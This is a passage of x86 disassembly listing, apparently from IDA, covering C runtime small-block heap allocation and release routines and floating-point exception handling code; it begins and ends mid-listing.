loc_4199A3: ; CODE XREF: sub_4196B2+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_4196B2 endp
; =============== S U B R O U T I N E =======================================
sub_4199A8 proc near ; CODE XREF: sub_418E04+41�p
; sub_419CA0:loc_419E6F�p
cmp ds:dword_42F590, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_4199BC
mov esi, offset off_42F580
jmp short loc_4199D9
; ---------------------------------------------------------------------------
loc_4199BC: ; CODE XREF: sub_4199A8+B�j
push 2020h
push 0
push ds:dword_4CA704
call ds:dword_4220C8 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_419AE5
loc_4199D9: ; CODE XREF: sub_4199A8+12�j
mov ebp, ds:dword_42219C
push 4
push 2000h
push 400000h
push 0
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_419ACE
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; VirtualAlloc
test eax, eax
jz loc_419AC0
mov eax, offset off_42F580
cmp esi, eax
jnz short loc_419A38
cmp ds:off_42F580, 0
jnz short loc_419A28
mov ds:off_42F580, eax
loc_419A28: ; CODE XREF: sub_4199A8+79�j
cmp ds:off_42F584, 0
jnz short loc_419A4D
mov ds:off_42F584, eax
jmp short loc_419A4D
; ---------------------------------------------------------------------------
loc_419A38: ; CODE XREF: sub_4199A8+70�j
mov [esi], eax
mov eax, ds:off_42F584
mov [esi+4], eax
mov ds:off_42F584, esi
mov eax, [esi+4]
mov [eax], esi
loc_419A4D: ; CODE XREF: sub_4199A8+87�j
; sub_4199A8+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_419A6F: ; CODE XREF: sub_4199A8+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_419A6F
push ebx
push 0
push edi
call sub_415500
add esp, 0Ch
loc_419A98: ; CODE XREF: sub_4199A8+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_419ABC
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_419A98
; ---------------------------------------------------------------------------
loc_419ABC: ; CODE XREF: sub_4199A8+F7�j
mov eax, esi
jmp short loc_419AE7
; ---------------------------------------------------------------------------
loc_419AC0: ; CODE XREF: sub_4199A8+63�j
push 8000h
push 0
push edi
call ds:dword_422198 ; VirtualFree
loc_419ACE: ; CODE XREF: sub_4199A8+4B�j
cmp esi, offset off_42F580
jz short loc_419AE5
push esi
push 0
push ds:dword_4CA704
call ds:dword_4220C4 ; RtlFreeHeap
loc_419AE5: ; CODE XREF: sub_4199A8+2B�j
; sub_4199A8+12C�j
xor eax, eax
loc_419AE7: ; CODE XREF: sub_4199A8+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4199A8 endp
; =============== S U B R O U T I N E =======================================
sub_419AEC proc near ; CODE XREF: sub_419B42+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call ds:dword_422198 ; VirtualFree
cmp ds:off_4315A0, esi
jnz short loc_419B11
mov eax, [esi+4]
mov ds:off_4315A0, eax
loc_419B11: ; CODE XREF: sub_419AEC+1B�j
cmp esi, offset off_42F580
jz short loc_419B39
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push ds:dword_4CA704
call ds:dword_4220C4 ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_419B39: ; CODE XREF: sub_419AEC+2B�j
or ds:dword_42F590, 0FFFFFFFFh
pop esi
retn
sub_419AEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B42 proc near ; CODE XREF: sub_419C5B+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ds:off_42F584
push edi
loc_419B4F: ; CODE XREF: sub_419B42+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_419BED
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_419B68: ; CODE XREF: sub_419B42+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_419BA9
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call ds:dword_422198 ; VirtualFree
test eax, eax
jz short loc_419BA9
or dword ptr [edi], 0FFFFFFFFh
dec ds:dword_4C90EC
mov eax, [esi+0Ch]
test eax, eax
jz short loc_419B9E
cmp eax, edi
jbe short loc_419BA1
loc_419B9E: ; CODE XREF: sub_419B42+56�j
mov [esi+0Ch], edi
loc_419BA1: ; CODE XREF: sub_419B42+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_419BB6
loc_419BA9: ; CODE XREF: sub_419B42+2C�j
; sub_419B42+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_419B68
loc_419BB6: ; CODE XREF: sub_419B42+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_419BED
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_419BED
push 1
lea eax, [ecx+20h]
pop edx
loc_419BCD: ; CODE XREF: sub_419B42+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_419BDE
inc edx
add eax, 8
cmp edx, 400h
jl short loc_419BCD
loc_419BDE: ; CODE XREF: sub_419B42+8E�j
cmp edx, 400h
jnz short loc_419BED
push ecx
call sub_419AEC
pop ecx
loc_419BED: ; CODE XREF: sub_419B42+11�j
; sub_419B42+7D�j ...
cmp esi, ds:off_42F584
jz short loc_419BFF
cmp [ebp+arg_0], 0
jg loc_419B4F
loc_419BFF: ; CODE XREF: sub_419B42+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_419B42 endp
; =============== S U B R O U T I N E =======================================
sub_419C04 proc near ; CODE XREF: sub_415DE1+3A�p
; sub_41756F+173�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_42F580
push esi
mov ecx, edx
loc_419C10: ; CODE XREF: sub_419C04+1C�j
cmp eax, [ecx+10h]
jbe short loc_419C1A
cmp eax, [ecx+14h]
jb short loc_419C22
loc_419C1A: ; CODE XREF: sub_419C04+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_419C57
jmp short loc_419C10
; ---------------------------------------------------------------------------
loc_419C22: ; CODE XREF: sub_419C04+14�j
test al, 0Fh
jnz short loc_419C57
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_419C57
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_419C57: ; CODE XREF: sub_419C04+1A�j
; sub_419C04+20�j ...
xor eax, eax
pop esi
retn
sub_419C04 endp
; =============== S U B R O U T I N E =======================================
sub_419C5B proc near ; CODE XREF: sub_415DE1+4D�p
; sub_41756F+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_419C9F
inc ds:dword_4C90EC
cmp ds:dword_4C90EC, 20h
jnz short locret_419C9F
push 10h
call sub_419B42
pop ecx
locret_419C9F: ; CODE XREF: sub_419C5B+2B�j
; sub_419C5B+3A�j
retn
sub_419C5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419CA0 proc near ; CODE XREF: sub_415D6D+4A�p
; sub_41756F+1AC�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:off_4315A0
push edi
loc_419CAE: ; CODE XREF: sub_419CA0+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_419D59
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_419D13
loc_419CD9: ; CODE XREF: sub_419CA0+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_419CFC
cmp [edi+4], ebx
jbe short loc_419CFC
push ebx
push ecx
push eax
call sub_419EA8
add esp, 0Ch
test eax, eax
jnz short loc_419D6B
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_419CFC: ; CODE XREF: sub_419CA0+40�j
; sub_419CA0+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_419CD9
jmp short loc_419D16
; ---------------------------------------------------------------------------
loc_419D13: ; CODE XREF: sub_419CA0+37�j
mov ebx, [ebp+arg_0]
loc_419D16: ; CODE XREF: sub_419CA0+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_419D5C
loc_419D29: ; CODE XREF: sub_419CA0+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_419D48
cmp [edi+4], ebx
jbe short loc_419D48
push ebx
push eax
push [ebp+var_4]
call sub_419EA8
add esp, 0Ch
test eax, eax
jnz short loc_419D6B
mov [edi+4], ebx
loc_419D48: ; CODE XREF: sub_419CA0+8D�j
; sub_419CA0+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_419D29
jmp short loc_419D5C
; ---------------------------------------------------------------------------
loc_419D59: ; CODE XREF: sub_419CA0+14�j
mov ebx, [ebp+arg_0]
loc_419D5C: ; CODE XREF: sub_419CA0+87�j
; sub_419CA0+B7�j
mov esi, [esi]
cmp esi, ds:off_4315A0
jz short loc_419D7B
jmp loc_419CAE
; ---------------------------------------------------------------------------
loc_419D6B: ; CODE XREF: sub_419CA0+54�j
; sub_419CA0+A3�j
mov ds:off_4315A0, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_419EA3
; ---------------------------------------------------------------------------
loc_419D7B: ; CODE XREF: sub_419CA0+C4�j
mov eax, offset off_42F580
mov edi, eax
loc_419D82: ; CODE XREF: sub_419CA0+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_419D8E
cmp dword ptr [edi+0Ch], 0
jnz short loc_419D9A
loc_419D8E: ; CODE XREF: sub_419CA0+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_419E6F
jmp short loc_419D82
; ---------------------------------------------------------------------------
loc_419D9A: ; CODE XREF: sub_419CA0+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_419DC9
loc_419DB8: ; CODE XREF: sub_419CA0+127�j
cmp [ebp+var_4], 10h
jge short loc_419DC9
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_419DB8
loc_419DC9: ; CODE XREF: sub_419CA0+116�j
; sub_419CA0+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call ds:dword_42219C ; VirtualAlloc
cmp eax, esi
jnz loc_419EA1
push 0
push [ebp+var_8]
push esi
call sub_415500
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_419E30
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_419E06: ; CODE XREF: sub_419CA0+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_419E06
loc_419E30: ; CODE XREF: sub_419CA0+15E�j
mov ds:off_4315A0, edi
lea eax, [edi+2018h]
loc_419E3C: ; CODE XREF: sub_419CA0+1A8�j
cmp ecx, eax
jnb short loc_419E4C
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_419E4A
add ecx, 8
jmp short loc_419E3C
; ---------------------------------------------------------------------------
loc_419E4A: ; CODE XREF: sub_419CA0+1A3�j
cmp ecx, eax
loc_419E4C: ; CODE XREF: sub_419CA0+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_419EA3
; ---------------------------------------------------------------------------
loc_419E6F: ; CODE XREF: sub_419CA0+F2�j
call sub_4199A8
test eax, eax
jz short loc_419EA1
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov ds:off_4315A0, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_419EA3
; ---------------------------------------------------------------------------
loc_419EA1: ; CODE XREF: sub_419CA0+143�j
; sub_419CA0+1D6�j
xor eax, eax
loc_419EA3: ; CODE XREF: sub_419CA0+D6�j
; sub_419CA0+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419CA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EA8 proc near ; CODE XREF: sub_419CA0+4A�p
; sub_419CA0+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_419EED
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_419EDC
add [ecx], edx
sub [ecx+4], edx
jmp short loc_419EE5
; ---------------------------------------------------------------------------
loc_419EDC: ; CODE XREF: sub_419EA8+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_419EE5: ; CODE XREF: sub_419EA8+32�j
lea eax, [edi+8]
jmp loc_419FBB
; ---------------------------------------------------------------------------
loc_419EED: ; CODE XREF: sub_419EA8+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_419EF6
mov eax, esi
loc_419EF6: ; CODE XREF: sub_419EA8+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_419F40
loc_419EFD: ; CODE XREF: sub_419EA8+96�j
mov bl, [eax]
test bl, bl
jnz short loc_419F33
push 1
lea ebx, [eax+1]
pop esi
loc_419F09: ; CODE XREF: sub_419EA8+68�j
cmp byte ptr [ebx], 0
jnz short loc_419F12
inc ebx
inc esi
jmp short loc_419F09
; ---------------------------------------------------------------------------
loc_419F12: ; CODE XREF: sub_419EA8+64�j
cmp esi, edx
jnb short loc_419F64
cmp eax, [ebp+var_4]
jnz short loc_419F20
mov [ecx+4], esi
jmp short loc_419F2C
; ---------------------------------------------------------------------------
loc_419F20: ; CODE XREF: sub_419EA8+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_419FC5
loc_419F2C: ; CODE XREF: sub_419EA8+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_419F38
; ---------------------------------------------------------------------------
loc_419F33: ; CODE XREF: sub_419EA8+59�j
movzx esi, bl
add eax, esi
loc_419F38: ; CODE XREF: sub_419EA8+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_419EFD
loc_419F40: ; CODE XREF: sub_419EA8+53�j
lea esi, [ecx+8]
loc_419F43: ; CODE XREF: sub_419EA8+EB�j
; sub_419EA8+F2�j
cmp esi, edi
jnb short loc_419FC5
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_419FC5
mov al, [esi]
test al, al
jnz short loc_419F95
push 1
lea ebx, [esi+1]
pop eax
loc_419F5B: ; CODE XREF: sub_419EA8+BA�j
cmp byte ptr [ebx], 0
jnz short loc_419F85
inc ebx
inc eax
jmp short loc_419F5B
; ---------------------------------------------------------------------------
loc_419F64: ; CODE XREF: sub_419EA8+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_419F75
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_419F7E
; ---------------------------------------------------------------------------
loc_419F75: ; CODE XREF: sub_419EA8+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_419F7E: ; CODE XREF: sub_419EA8+CB�j
mov [eax], dl
add eax, 8
jmp short loc_419FBB
; ---------------------------------------------------------------------------
loc_419F85: ; CODE XREF: sub_419EA8+B6�j
cmp eax, edx
jnb short loc_419F9C
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_419FC5
mov esi, ebx
jmp short loc_419F43
; ---------------------------------------------------------------------------
loc_419F95: ; CODE XREF: sub_419EA8+AB�j
movzx eax, al
add esi, eax
jmp short loc_419F43
; ---------------------------------------------------------------------------
loc_419F9C: ; CODE XREF: sub_419EA8+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_419FAD
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_419FB6
; ---------------------------------------------------------------------------
loc_419FAD: ; CODE XREF: sub_419EA8+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_419FB6: ; CODE XREF: sub_419EA8+103�j
mov [esi], dl
lea eax, [esi+8]
loc_419FBB: ; CODE XREF: sub_419EA8+40�j
; sub_419EA8+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_419FC7
; ---------------------------------------------------------------------------
loc_419FC5: ; CODE XREF: sub_419EA8+7E�j
; sub_419EA8+9D�j ...
xor eax, eax
loc_419FC7: ; CODE XREF: sub_419EA8+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_419EA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419FCC proc near ; CODE XREF: sub_41756F+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_41A006
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_41A066
; ---------------------------------------------------------------------------
loc_41A006: ; CODE XREF: sub_419FCC+26�j
jnb short loc_41A06D
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_41A06D
lea eax, [ecx+edx]
loc_41A01B: ; CODE XREF: sub_419FCC+59�j
cmp eax, esi
jnb short loc_41A029
cmp byte ptr [eax], 0
jnz short loc_41A027
inc eax
jmp short loc_41A01B
; ---------------------------------------------------------------------------
loc_41A027: ; CODE XREF: sub_419FCC+56�j
cmp eax, esi
loc_41A029: ; CODE XREF: sub_419FCC+51�j
jnz short loc_41A06D
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_41A061
cmp esi, eax
jbe short loc_41A061
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_41A058
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_41A053
loc_41A04C: ; CODE XREF: sub_419FCC+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_41A04C
loc_41A053: ; CODE XREF: sub_419FCC+7E�j
mov [ebx+4], eax
jmp short loc_41A061
; ---------------------------------------------------------------------------
loc_41A058: ; CODE XREF: sub_419FCC+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_41A061: ; CODE XREF: sub_419FCC+68�j
; sub_419FCC+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_41A066: ; CODE XREF: sub_419FCC+38�j
mov [ebp+var_4], 1
loc_41A06D: ; CODE XREF: sub_419FCC:loc_41A006�j
; sub_419FCC+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_419FCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_41A075(int,int,double,int)
sub_41A075 proc near ; CODE XREF: sub_415E4A+51�p
; sub_415F93+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_431CF8, 0
jnz short loc_41A0AA
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_41A62A
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A0AA: ; CODE XREF: sub_41A075+A�j
push 0FFFFh
mov ds:dword_4C9084, 21h
push [ebp+arg_C]
call sub_41A89D
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_41A075 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A0C8(int,int,double,double,int)
sub_41A0C8 proc near ; CODE XREF: sub_415E4A:loc_415F0D�p
; sub_415F93:loc_416056�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_41A413
add esp, 0Ch
test eax, eax
jnz short loc_41A106
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_41A160
add esp, 18h
loc_41A106: ; CODE XREF: sub_41A0C8+1A�j
push [ebp+arg_0]
call sub_41A6FD
cmp ds:dword_431CF8, 0
pop ecx
jnz short loc_41A144
test eax, eax
jz short loc_41A144
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_41A62A
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_41A144: ; CODE XREF: sub_41A0C8+4E�j
; sub_41A0C8+52�j
push eax
call sub_41A6B2
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_41A89D
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_41A0C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A160 proc near ; CODE XREF: sub_41A0C8+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_41A192
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_41A192: ; CODE XREF: sub_41A160+23�j
test cl, 2
jz short loc_41A1A5
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_41A1A5: ; CODE XREF: sub_41A160+35�j
test cl, bl
jz short loc_41A1B7
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_41A1B7: ; CODE XREF: sub_41A160+47�j
test cl, 4
jz short loc_41A1CA
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_41A1CA: ; CODE XREF: sub_41A160+5A�j
test cl, 8
jz short loc_41A1DD
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_41A1DD: ; CODE XREF: sub_41A160+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_41A880
test al, bl
jz short loc_41A266
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_41A266: ; CODE XREF: sub_41A160+FD�j
test al, 4
jz short loc_41A271
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_41A271: ; CODE XREF: sub_41A160+108�j
test al, 8
jz short loc_41A27C
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_41A27C: ; CODE XREF: sub_41A160+113�j
test al, 10h
jz short loc_41A286
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_41A286: ; CODE XREF: sub_41A160+11E�j
test al, 20h
jz short loc_41A290
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_41A290: ; CODE XREF: sub_41A160+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_41A2CF
cmp eax, 400h
jz short loc_41A2C1
cmp eax, 800h
jz short loc_41A2B5
cmp eax, ecx
jnz short loc_41A2D5
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_41A2D5
; ---------------------------------------------------------------------------
loc_41A2B5: ; CODE XREF: sub_41A160+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_41A2CB
; ---------------------------------------------------------------------------
loc_41A2C1: ; CODE XREF: sub_41A160+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_41A2CB: ; CODE XREF: sub_41A160+15F�j
mov [eax], ecx
jmp short loc_41A2D5
; ---------------------------------------------------------------------------
loc_41A2CF: ; CODE XREF: sub_41A160+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_41A2D5: ; CODE XREF: sub_41A160+14B�j
; sub_41A160+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_41A300
cmp eax, 200h
jz short loc_41A2F3
cmp eax, ecx
jnz short loc_41A30D
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_41A30D
; ---------------------------------------------------------------------------
loc_41A2F3: ; CODE XREF: sub_41A160+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_41A30B
; ---------------------------------------------------------------------------
